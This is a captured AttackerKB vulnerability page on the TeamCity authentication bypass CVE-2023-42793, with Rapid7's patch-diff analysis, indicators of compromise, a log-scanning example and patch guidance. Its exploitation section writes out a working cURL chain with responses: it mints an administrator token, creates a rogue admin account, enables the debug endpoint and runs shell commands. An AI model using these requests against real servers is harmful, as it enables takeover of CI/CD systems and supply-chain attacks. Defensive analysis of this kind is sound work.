Submitted URL: https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793?referrer=notificationEmail#rapid7-analysis/
Effective URL: https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793?referrer=notificationEmail
Submission: On February 18 via api from RU — Scanned from DE
A Rapid7 Project

CVE-2023-42793
Last updated September 27, 2023

Attacker Value: VERY HIGH (2 users assessed)
Exploitability: VERY HIGH (2 users assessed)
User Interaction: UNKNOWN
Privileges Required: UNKNOWN
Attack Vector: UNKNOWN

Exploited in the Wild: reported by ccondon-r7 and 2 more

MITRE ATT&CK
Collection techniques: Input Capture: Credential API Hooking (Validated)
Impact techniques: Data Destruction (Validated)

Metasploit Module: exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793

TOPIC TAGS
* CISA KEV Listed
* Gives privileged access
* Observed in nation state sponsored attacks
* Observed in ransomware attacks
* Unauthenticated
* Vulnerable in default configuration

DESCRIPTION
In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible.

RATINGS & ANALYSIS

sfewer-r7 (72), September 27, 2023 1:47pm UTC (edited)

RATINGS
Attacker Value: Very High
Exploitability: Very High
Tags: Gives privileged access, Unauthenticated, Vulnerable in default configuration

TECHNICAL ANALYSIS
Based on the accompanying Rapid7 Analysis, the attacker value for CVE-2023-42793 is very high given the target product is a CI/CD server, and as such may contain sensitive information such as source code or signing keys, in addition to being a vector for conducting a supply chain attack.
The exploitability for this vulnerability is also very high, as the product is vulnerable in a default configuration and an attacker can trivially exploit it with a sequence of cURL commands.

cbeek-r7 (94), October 19, 2023 11:53am UTC

RATINGS
Attacker Value: Very High
Exploitability: Very High
Tags: CISA KEV Listed, Gives privileged access, Observed in nation state sponsored attacks, Unauthenticated, Vulnerable in default configuration

TECHNICAL ANALYSIS
Microsoft released a blog where they mentioned the abuse of this vulnerability by nation-state sponsored actors.

GENERAL INFORMATION
Offensive Application: Unknown
Utility Class: Unknown
Ports: Unknown
OS: Unknown
Vulnerable Versions: TeamCity 2023.05.4
Prerequisites: Unknown
Discovered By: Unknown
PoC Author: Unknown
Metasploit Module: Unknown
Reporter: Unknown

VENDORS
* JetBrains

PRODUCTS
* TeamCity

METASPLOIT MODULES
* exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793 (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb)

EXPLOITED IN THE WILD
Reported by ccondon-r7, who indicated the source as Threat Feed (https://viz.greynoise.io/tag/jetbrains-teamcity-authentication-bypass-attempt?days=10). Reported: October 02, 2023 11:52am UTC.
Reported by: inokii indicated sources as:
* Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
* Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/10/04/cisa-adds-two-known-exploited-vulnerabilities-catalog-removes-five-kevs)
Reported: October 04, 2023 9:30pm UTC (4 months ago)

Reported by: cbeek-r7 indicated source as Government or Industry Alert (https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/)
Reported: October 19, 2023 11:53am UTC (3 months ago)

REFERENCES

CANONICAL
* CVE-2023-42793 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42793)

MISCELLANEOUS
* https://www.jetbrains.com/privacy-security/issues-fixed/
* https://blog.jetbrains.com/teamcity/2023/09/cve-2023-42793-vulnerability-post-mortem/
* http://packetstormsecurity.com/files/174860/JetBrains-TeamCity-Unauthenticated-Remote-Code-Execution.html
* https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793
* https://www.securityweek.com/recently-patched-teamcity-vulnerability-exploited-to-hack-servers/
* https://www.rapid7.com/blog/post/2023/09/25/etr-cve-2023-42793-critical-authentication-bypass-in-jetbrains-teamcity-ci-cd-servers/

ADDITIONAL INFO

Authenticated: Unknown
Exploitable: Unknown
Reliability: Unknown
Stability: Unknown
Available Mitigations: Unknown
Shelf Life: Unknown
Userbase/Installbase: Unknown
Patch Effectiveness: Unknown

Rapid7 September 27, 2023 1:43pm UTC (4 months ago)

TECHNICAL ANALYSIS

OVERVIEW

CVE-2023-42793 is a critical authentication bypass published on September 19, 2023 that affects on-premises instances of JetBrains TeamCity, a CI/CD server.
The vulnerability, originally discovered by Sonar, allows an unauthenticated attacker to achieve remote code execution (RCE) on the server. By compromising a CI/CD server the attacker will have access to private data such as source code, access keys, code signing certificates and other build components commonly accessible by a CI/CD server. This places the attacker in a strong position to achieve a supply chain attack by compromising the integrity of the server’s build process and the resulting build artifacts, such as compiled binaries. The vulnerability has a CVSS base score of 9.8. All versions of JetBrains TeamCity prior to the patched version 2023.05.4 are vulnerable to this issue. There is no known exploitation in the wild as of September 27, 2023.

TECHNICAL ANALYSIS

In this technical analysis we will analyze the vulnerability as it affects JetBrains TeamCity 2023.05.3 running on Windows Server 2022. By default, the vulnerable web interface listens for HTTP connections on TCP port 8111.

PATCH DIFFING

To diff out the bug we downloaded the vulnerable version 2023.05.3 and the patched version 2023.05.4. Extracting these two installers with 7-Zip yields two folders, .\2023.05.3\ and .\2023.05.4\, containing the entire contents of the install for each version. Inspecting the contents of the two folders with a diffing tool such as Beyond Compare, we can identify the Java library web.jar as being of interest. Using the cfr decompiler we can decompile the web.jar library from each version into two separate folders as follows:

    java -Xmx1g -jar cfr-0.152.jar --outputdir .\2023.05.3\web.jar\ .\2023.05.3\webapps\ROOT\WEB-INF\lib\web.jar
    java -Xmx1g -jar cfr-0.152.jar --outputdir .\2023.05.4\web.jar\ .\2023.05.4\webapps\ROOT\WEB-INF\lib\web.jar

We can now diff the Java source. The file RequestInterceptors.java stands out, as a suspicious wildcard path has been removed.
Examining the XmlRpcController.getPathSuffix method shows that the wildcard path added to the myPreHandlingDisabled PathSet is /**/RPC2. Investigating this further reveals this path is the root cause of the authentication bypass vulnerability.

AUTHENTICATION BYPASS

To learn why the wildcard path /**/RPC2 leads to an authentication bypass vulnerability, we must understand what this path does. The TeamCity server is a large Java Spring application; the configuration file C:\TeamCity\webapps\ROOT\WEB-INF\buildServerSpringWeb.xml creates several interceptors, which intercept and potentially modify incoming HTTP requests to the server. Of interest to us is the calledOnceInterceptors Java bean.

    <mvc:interceptors>
        <ref bean="externalLoadBalancerInterceptor"/>
        <ref bean="agentsLoadBalancer"/>
        <ref bean="calledOnceInterceptors"/>
        <ref bean="pageExtensionInterceptor"/>
    </mvc:interceptors>

    <bean id="calledOnceInterceptors" class="jetbrains.buildServer.controllers.interceptors.RequestInterceptors">
        <constructor-arg index="0">
            <list>
                <ref bean="mainServerInterceptor"/>
                <ref bean="registrationInvitations"/>
                <ref bean="projectIdConverterInterceptor"/>
                <ref bean="authorizedUserInterceptor"/>
                <ref bean="twoFactorAuthenticationInterceptor"/>
                <ref bean="firstLoginInterceptor"/>
                <ref bean="pluginUIContextProvider"/>
                <ref bean="callableInterceptorRegistrar"/>
            </list>
        </constructor-arg>
    </bean>

We can see the calledOnceInterceptors bean will be an instance of the jetbrains.buildServer.controllers.interceptors.RequestInterceptors class, which contains the wildcard path we are interested in. We can also see that when constructing the RequestInterceptors instance, several Java beans are passed as a list, including authorizedUserInterceptor. These beans will be added to the myInterceptors list during instantiation.
    public RequestInterceptors(@NotNull List<HandlerInterceptor> paramList) {
        this.myInterceptors.addAll(paramList);
        this.myPreHandlingDisabled.addPath("/**" + XmlRpcController.getPathSuffix());
        this.myPreHandlingDisabled.addPath("/app/agents/**");
    }

The RequestInterceptors instance will then intercept HTTP requests via its preHandle method, as shown below.

    public final boolean preHandle(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse, Object paramObject) throws Exception {
        try {
            if (!requestPreHandlingAllowed(paramHttpServletRequest)) // <---
                return true; // <--- return early, no authentication checks!
        } catch (Exception exception) {
            throw null;
        }
        Stack stack = requestIn(paramHttpServletRequest);
        try {
            if (stack.size() >= 70 && paramHttpServletRequest.getAttribute("__tc_requestStack_overflow") == null) {
                LOG.warn("Possible infinite recursion of page includes. Request: " + WebUtil.getRequestDump(paramHttpServletRequest));
                paramHttpServletRequest.setAttribute("__tc_requestStack_overflow", this);
                Throwable throwable = (new ServletException("Too much recurrent forward or include operations")).fillInStackTrace();
                paramHttpServletRequest.setAttribute("javax.servlet.jsp.jspException", throwable);
            }
        } catch (Exception exception) {
            throw null;
        }
        if (stack.size() == 1)
            for (HandlerInterceptor handlerInterceptor : this.myInterceptors) {
                try {
                    if (!handlerInterceptor.preHandle(paramHttpServletRequest, paramHttpServletResponse, paramObject)) // <--- enforce authentication checks :(
                        return false;
                } catch (Exception exception) {
                    throw null;
                }
            }
        return true;
    }

Of note is that if requestPreHandlingAllowed returns false (note the negation in the if statement’s condition), the preHandle method will return early. However, if requestPreHandlingAllowed returns true, the myInterceptors list will be iterated and each interceptor on the list will be run against the request.
This includes the authorizedUserInterceptor bean (an instance of jetbrains.buildServer.controllers.interceptors.AuthorizationInterceptorImpl), which will enforce authentication on the request if needed. Therefore, if we can send a request to a URL that causes requestPreHandlingAllowed to return false, we can skip the authentication checks. Examining requestPreHandlingAllowed, we see the PathSet myPreHandlingDisabled, which we know to contain the wildcard path /**/RPC2, is used to test the incoming HTTP request’s path.

    private boolean requestPreHandlingAllowed(@NotNull HttpServletRequest paramHttpServletRequest) {
        try {
            if (paramHttpServletRequest == null)
                $$$reportNull$$$0(5);
        } catch (IllegalArgumentException illegalArgumentException) {
            throw null;
        }
        try {
            if (WebUtil.isJspPrecompilationRequest(paramHttpServletRequest))
                return false;
        } catch (IllegalArgumentException illegalArgumentException) {
            throw null;
        }
        try {
        } catch (IllegalArgumentException illegalArgumentException) {
            throw null;
        }
        return !this.myPreHandlingDisabled.matches(WebUtil.getPathWithoutContext(paramHttpServletRequest));
    }

Therefore, any incoming HTTP request that matches the wildcard path /**/RPC2 will not be subject to the authentication checks performed by the beans in the myInterceptors list during RequestInterceptors.preHandle. However, even though we can construct a path that avoids authentication checks, we still need to locate a target endpoint the attacker can leverage which also conforms to the wildcard path: specifically, the target endpoint must end with the string /RPC2.

EXPLOITATION

To leverage the authentication bypass vulnerability, we will target TeamCity’s REST API, as implemented in the library C:\TeamCity\webapps\ROOT\WEB-INF\plugins\.unpacked\rest-api\server\rest-api.jar. Decompiling this library with cfr we can begin to explore the code.
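Before moving on to the REST API, the interceptor logic from the AUTHENTICATION BYPASS section is worth seeing end to end, including what the fix changes. The following Python model is an added example and is not TeamCity or Spring code: the Ant-style matcher, the Request type and the AuthorizationInterceptor stand-in (which, for the model, requires authentication on everything under /app/rest/) are simplifications of this example's own. It reproduces the constructor, preHandle and requestPreHandlingAllowed decisions shown above, and models the patched build as simply no longer adding the /**/RPC2 entry, which is the removed wildcard path the PATCH DIFFING section describes.

```python
import re
from dataclasses import dataclass


def ant_pattern_to_regex(pattern: str) -> "re.Pattern[str]":
    """Translate an Ant-style path pattern such as "/**/RPC2" or "/app/agents/**"
    into an anchored regular expression: "**" spans any number of path segments,
    "*" spans characters within one segment. Simplified stand-in for Spring's
    AntPathMatcher (an assumption of this example), not the real implementation."""
    out = ""
    i = 0
    while i < len(pattern):
        if pattern.startswith("/**/", i):
            out += "/(?:.*/)?"   # "/**/" matches zero or more whole segments
            i += 4
        elif pattern.startswith("**", i):
            out += ".*"
            i += 2
        elif pattern[i] == "*":
            out += "[^/]*"
            i += 1
        else:
            out += re.escape(pattern[i])
            i += 1
    return re.compile("^" + out + "$")


class PathSet:
    """Stand-in for TeamCity's PathSet: a list of patterns plus a matches() test."""

    def __init__(self) -> None:
        self._patterns: list = []

    def add_path(self, pattern: str) -> None:
        self._patterns.append(ant_pattern_to_regex(pattern))

    def matches(self, path: str) -> bool:
        return any(p.match(path) for p in self._patterns)


@dataclass
class Request:
    path: str                  # path without the servlet context, e.g. "/app/rest/users"
    authenticated: bool = False


class AuthorizationInterceptor:
    """Stand-in for authorizedUserInterceptor. Model assumption: every request
    under /app/rest/ must be authenticated; anything else passes through."""

    def pre_handle(self, req: Request) -> bool:
        return req.authenticated or not req.path.startswith("/app/rest/")


class RequestInterceptors:
    """Mirrors the constructor and preHandle()/requestPreHandlingAllowed() logic
    shown above. with_rpc2_wildcard=True reproduces the vulnerable constructor;
    False models the patched build, in which that addPath() call is gone."""

    def __init__(self, interceptors, with_rpc2_wildcard: bool) -> None:
        self.my_interceptors = list(interceptors)
        self.my_pre_handling_disabled = PathSet()
        if with_rpc2_wildcard:
            # Java: addPath("/**" + XmlRpcController.getPathSuffix()), i.e. "/**/RPC2"
            self.my_pre_handling_disabled.add_path("/**" + "/RPC2")
        self.my_pre_handling_disabled.add_path("/app/agents/**")

    def request_pre_handling_allowed(self, req: Request) -> bool:
        return not self.my_pre_handling_disabled.matches(req.path)

    def pre_handle(self, req: Request) -> bool:
        """True: the request proceeds to its controller. False: it is rejected."""
        if not self.request_pre_handling_allowed(req):
            return True   # early return: no interceptor, and so no auth check, runs
        # all() stops at the first interceptor returning False, like the Java loop
        return all(i.pre_handle(req) for i in self.my_interceptors)


def decision(path: str, authenticated: bool, patched: bool) -> str:
    """Outcome of the interceptor chain for one request, as a short label."""
    chain = RequestInterceptors([AuthorizationInterceptor()], with_rpc2_wildcard=not patched)
    return "proceeds" if chain.pre_handle(Request(path, authenticated)) else "rejected"


if __name__ == "__main__":
    token_path = "/app/rest/users/id:1/tokens/RPC2"
    for patched in (False, True):
        label = "2023.05.4 (patched)" if patched else "2023.05.3 (vulnerable)"
        print(f"{label}: unauthenticated {token_path} -> {decision(token_path, False, patched)}")
        print(f"{label}: unauthenticated /app/rest/users -> {decision('/app/rest/users', False, patched)}")
```

The point the model makes is that the pre-handling check runs before any interceptor and is keyed purely on the request path, so a path-based exemption list shared with a sensitive route family (here, the REST API's templated last segment) disables every interceptor at once, not just the XML-RPC handling it was meant for. Removing the wildcard entry restores the normal chain for the same request.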
The REST API will use Java’s Web Services @Path annotation to connect methods with URI endpoints whilst also defining variable names as templates within the path. For example, @Path(value="/{foo}/properties") will match a URI that ends with a path segment /properties, and the preceding path segment’s value will be available to the method being annotated (via an additional @PathParam(value="foo") annotation). Since this technique of constructing URI endpoints allows for endpoints with arbitrary values in the path, we want to locate the endpoints that end in a templated variable, as this will allow us to supply the /RPC2 portion of the URI that is required by the vulnerability. Searching the decompiled code for the regular expression /@Path\(value=\"\S+}\"\)/ will find all instances that meet this requirement. After some investigation we identify the jetbrains.buildServer.server.rest.request.UserRequest class as being of interest, as shown below.

    .\2023.05.3\rest-api\jetbrains\buildServer\server\rest\request\UserRequest.java (17 hits)
    Line 169: @Path(value="/{userLocator}")
    Line 177: @Path(value="/{userLocator}")
    Line 189: @Path(value="/{userLocator}")
    Line 200: @Path(value="/{userLocator}/{field}")
    Line 208: @Path(value="/{userLocator}/{field}")
    Line 218: @Path(value="/{userLocator}/{field}")
    Line 235: @Path(value="/{userLocator}/properties/{name}")
    Line 243: @Path(value="/{userLocator}/properties/{name}")
    Line 257: @Path(value="/{userLocator}/properties/{name}")
    Line 304: @Path(value="/{userLocator}/roles/{roleId}/{scope}")
    Line 313: @Path(value="/{userLocator}/roles/{roleId}/{scope}")
    Line 323: @Path(value="/{userLocator}/roles/{roleId}/{scope}")
    Line 329: @Path(value="/{userLocator}/roles/{roleId}/{scope}")
    Line 371: @Path(value="/{userLocator}/groups/{groupLocator}")
    Line 387: @Path(value="/{userLocator}/groups/{groupLocator}")
    Line 465: @Path(value="/{userLocator}/tokens/{name}")
    Line 494: @Path(value="/{userLocator}/tokens/{name}")

The method createToken appears to allow the caller to create an access token for a specified user by sending an HTTP POST request to the endpoint /app/rest/users/{userLocator}/tokens/{name}. As this endpoint ends in a templated variable, we know we can supply the required /RPC2 value for the authentication bypass. This will provide a token name of RPC2 during the call to createToken. To specify a suitable userLocator, we want to provide the name of an administrator user on the system. TeamCity lets you choose an arbitrary username during installation, so we don’t necessarily know the actual username of an administrator account. Handily, however, the first user (with an ID of 1) will always be the Administrator created during system install. As a result, we can rely on the ability to specify a user via an ID value using the string id:1.

    @Path("/app/rest/users")
    @Api("User")
    public class UserRequest {
        @POST
        @Path("/{userLocator}/tokens/{name}")
        @Produces({"application/xml", "application/json"})
        @ApiOperation(value = "Create a new authentication token for the matching user.", nickname = "addUserToken", hidden = true)
        public Token createToken(@ApiParam(format = "UserLocator") @PathParam("userLocator") String userLocator, @PathParam("name") @NotNull String name, @QueryParam("fields") String fields) {
            if (name == null)
                $$$reportNull$$$0(1);
            TokenAuthenticationModel tokenAuthenticationModel = (TokenAuthenticationModel)this.myBeanContext.getSingletonService(TokenAuthenticationModel.class);
            SUser user = this.myUserFinder.getItem(userLocator, true);
            try {
                AuthenticationToken token = tokenAuthenticationModel.createToken(user.getId(), name, new Date(PermanentTokenConstants.NO_EXPIRE.getTime()));
                return new Token(token, token.getValue(), new Fields(fields), this.myBeanContext);
            } catch (jetbrains.buildServer.serverSide.auth.AuthenticationTokenStorage.CreationException e) {
                throw new BadRequestException(e.getMessage());
            }
        }
    }

We can now create an authentication token for an Administrator user via the following cURL request, which leverages the RPC2 authentication bypass vulnerability to successfully reach the target endpoint.

    curl -X POST http://192.168.86.50:8111/app/rest/users/id:1/tokens/RPC2

The following is returned to the attacker, containing a newly minted authentication token with Administrator privileges.

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?><token name="RPC2" creationTime="2023-09-27T02:15:35.609-07:00" value="eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2"/>

Now that we have an Administrator authentication token, we can take over the server. We have full access to the TeamCity REST API and can perform a multitude of operations, such as creating a new Administrator account with a known password. This allows us to log into the web interface if needed.

    curl --path-as-is -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2" -X POST http://192.168.86.50:8111/app/rest/users -H "Content-Type: application/json" --data "{\"username\": \"haxor\", \"password\": \"haxor\", \"email\": \"haxor\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}"

As we can see below, we have created a new Admin user account with a password we know. Alternatively, to execute arbitrary shell commands on the target server we can further leverage the API, specifically an undocumented debug API endpoint /app/rest/debug/processes, as shown below.
    @Path(value="/app/rest/debug")
    @Api(value="Debug", hidden=true)
    public class DebugRequest {
        @POST
        @Path(value="/processes")
        @Consumes(value={"text/plain"})
        @Produces(value={"text/plain"})
        public String runProcess(@QueryParam(value="exePath") String exePath, @QueryParam(value="params") List<String> params, final @QueryParam(value="idleTimeSeconds") Integer idleTimeSeconds, final @QueryParam(value="maxOutputBytes") Integer maxOutputBytes, @QueryParam(value="charset") String charset, String input) {
            if (!TeamCityProperties.getBoolean((String)"rest.debug.processes.enable")) { // <---
                throw new BadRequestException("This server is not configured to allow process debug launch via " + LogUtil.quote((String)"rest.debug.processes.enable") + " internal property");
            }
            this.myDataProvider.checkGlobalPermission(Permission.MANAGE_SERVER_INSTALLATION);
            GeneralCommandLine cmd = new GeneralCommandLine();
            cmd.setExePath(exePath);
            cmd.addParameters(params);
            Loggers.ACTIVITIES.info("External process is launched by user " + this.myPermissionChecker.getCurrentUserDescription() + ". Command line: " + cmd.getCommandLineString());
            Stopwatch action = Stopwatch.createStarted();
            ExecResult execResult = SimpleCommandLineProcessRunner.runCommand((GeneralCommandLine)cmd, (byte[])input.getBytes(Charset.forName(charset != null ? charset : "UTF-8")), (SimpleCommandLineProcessRunner.RunCommandEvents)new SimpleCommandLineProcessRunner.RunCommandEventsAdapter(){
                public Integer getOutputIdleSecondsTimeout() {
                    return idleTimeSeconds;
                }
                public Integer getMaxAcceptedOutputSize() {
                    return maxOutputBytes != null && maxOutputBytes > 0 ? maxOutputBytes : 0x100000;
                }
            });
            action.stop();
            StringBuffer result = new StringBuffer();
            result.append("StdOut:").append(execResult.getStdout()).append("\n");
            result.append("StdErr: ").append(execResult.getStderr()).append("\n");
            result.append("Exit code: ").append(execResult.getExitCode()).append("\n");
            result.append("Time: ").append(TimePrinter.createMillisecondsFormatter().formatTime(action.elapsed(TimeUnit.MILLISECONDS)));
            return result.toString();
        }
    }

The ability to call this endpoint is gated by the configuration option rest.debug.processes.enable, which is disabled by default. Therefore, we must first enable this option via the following request.

    curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2" -X POST http://192.168.86.50:8111/admin/dataDir.html?action=edit^&fileName=config%2Finternal.properties^&content=rest.debug.processes.enable=true

Finally, for this option to be used by the system we must refresh the server via the following request.

    curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2" http://192.168.86.50:8111/admin/admin.html?item=diagnostics^&tab=dataDir^&file=config/internal.properties

We can now run an arbitrary shell command on the server with the following request to the /app/rest/debug/processes endpoint. For example:

    curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2" -X POST http://192.168.86.50:8111/app/rest/debug/processes?exePath=cmd.exe^&params=/c%20whoami

The server’s response for the above request shows the standard output of the process we created.

    StdOut:nt authority\system
    StdErr: 
    Exit code: 0
    Time: 59ms

From the output above, we can see we created the process cmd.exe "/c whoami" and the result that was printed to stdout was nt authority\system.
It is worth noting that when installing TeamCity, you can select to run the server as either the local system user, or a user account of your choosing that you must create. During testing we ran the TeamCity server as the local system user. Finally, an attacker can delete the authentication token they created via the following request.

    curl -X DELETE http://192.168.86.50:8111/app/rest/users/id:1/tokens/RPC2

INDICATORS OF COMPROMISE

On a Windows system, the log file C:\TeamCity\logs\teamcity-server.log will contain a log message when an attacker modifies the internal.properties file. There will also be a log message for every process created via the /app/rest/debug/processes endpoint. In addition to showing the command line used, the user ID of the user account whose authentication token was used during the attack is also shown. For example:

    [2023-09-26 11:53:46,970]   INFO -  ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
    [2023-09-26 11:53:46,970]   INFO -  s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"
    [2023-09-26 11:53:58,227]   INFO -  tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"

An attacker may attempt to cover their tracks by wiping this log file. It does not appear that TeamCity logs individual HTTP requests, but if TeamCity is configured to sit behind an HTTP proxy, the proxy may have suitable logs showing the following target endpoints being accessed:

* /app/rest/users/id:1/tokens/RPC2 – This endpoint is required to exploit the vulnerability.
* /app/rest/users – This endpoint is only required if the attacker wishes to create an arbitrary user.
* /app/rest/debug/processes – This endpoint is only required if the attacker wishes to create an arbitrary process.
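The indicators listed above can be turned into a small log scanner. The following Python is an added example, not part of the original analysis or of TeamCity: it matches the three teamcity-server.log message shapes quoted above and the three endpoints in a reverse-proxy access log. The proxy lines are assumed to be in the common combined log format (TeamCity itself produces no such log, as noted above); the server-log samples are the lines quoted above plus one constructed benign line, and the proxy samples, addresses and timestamps are constructed for the example.

```python
import re
from typing import Dict, Iterable, List

# --- teamcity-server.log indicators (the three message shapes quoted above) ---
SERVER_LOG_INDICATORS = {
    "internal_properties_edit": re.compile(
        r"File edited: .*[\\/]config[\\/]internal\.properties by user with id=(\d+)"),
    "internal_properties_audit": re.compile(
        r'server_file_change: File .*internal\.properties was modified by "user with id=(\d+)"'),
    "debug_process_launch": re.compile(
        r"External process is launched by user user with id=(\d+)\. Command line: (.*)$"),
}

# --- reverse-proxy access log (combined log format assumed) -------------------
COMBINED_LOG = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

PROXY_INDICATORS = {
    # the bypass signature itself: a token request whose name segment is RPC2
    "rpc2_token_bypass": re.compile(r"^/app/rest/users/[^/?]+/tokens/RPC2(?:\?|$)"),
    # follow-on activity listed in the IOC section
    "user_creation": re.compile(r"^/app/rest/users(?:\?|$)"),
    "debug_processes": re.compile(r"^/app/rest/debug/processes(?:\?|$)"),
}


def scan_server_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """One finding per teamcity-server.log line that matches an indicator."""
    findings = []
    for line in lines:
        for name, pattern in SERVER_LOG_INDICATORS.items():
            m = pattern.search(line)
            if m:
                finding = {"indicator": name, "user_id": m.group(1)}
                if name == "debug_process_launch":
                    finding["command_line"] = m.group(2).strip()
                findings.append(finding)
                break
    return findings


def scan_proxy_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """One finding per access-log line whose request target hits an indicator.
    Lines that do not parse as combined log format are skipped."""
    findings = []
    for line in lines:
        m = COMBINED_LOG.match(line)
        if not m:
            continue
        for name, pattern in PROXY_INDICATORS.items():
            if pattern.match(m["target"]):
                findings.append({"indicator": name, "src": m["src"], "method": m["method"],
                                 "target": m["target"], "status": m["status"]})
                break
    return findings


# Sample input: the "Server started" line is constructed, the other three server
# log lines are the ones quoted above, and every proxy line is constructed.
SAMPLE_SERVER_LOG = [
    r"[2023-09-26 11:50:01,003]   INFO - jetbrains.buildServer.SERVER - Server started (constructed line)",
    r"[2023-09-26 11:53:46,970]   INFO -  ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1",
    r'[2023-09-26 11:53:46,970]   INFO -  s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"',
    r'[2023-09-26 11:53:58,227]   INFO -  tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"',
]

SAMPLE_PROXY_LOG = [
    '203.0.113.7 - - [26/Sep/2023:11:53:40 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 371 "-" "curl/8.0.1"',
    '198.51.100.4 - - [26/Sep/2023:11:53:44 +0000] "GET /app/rest/builds?locator=count:1 HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [26/Sep/2023:11:53:58 +0000] "POST /app/rest/debug/processes?exePath=cmd.exe&params=/c%20whoami HTTP/1.1" 200 58 "-" "curl/8.0.1"',
    "garbage line that is not in combined format",
]

if __name__ == "__main__":
    for finding in scan_server_log(SAMPLE_SERVER_LOG) + scan_proxy_log(SAMPLE_PROXY_LOG):
        print(finding)
```

The token request to a name of RPC2 is the one indicator that identifies the bypass on its own; the other two endpoints are legitimate administrative traffic in normal use, so they are best treated as context for triage (which source address, which user ID, what command line) rather than as alerts by themselves. The user ID carried in the server-log lines is the account whose token was minted, which on a default install is the initial Administrator (id=1).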
GUIDANCE

The vulnerability has been resolved in version 2023.05.4 of JetBrains TeamCity. It is strongly recommended that all users update to the latest version of the software immediately. If you cannot upgrade to the fixed version or implement a targeted mitigation as specified in the JetBrains advisory, you should consider taking the server offline until the vulnerability can be mitigated.

REFERENCES

* Vendor Advisory
* Rapid7 Blog
* Sonar Advisory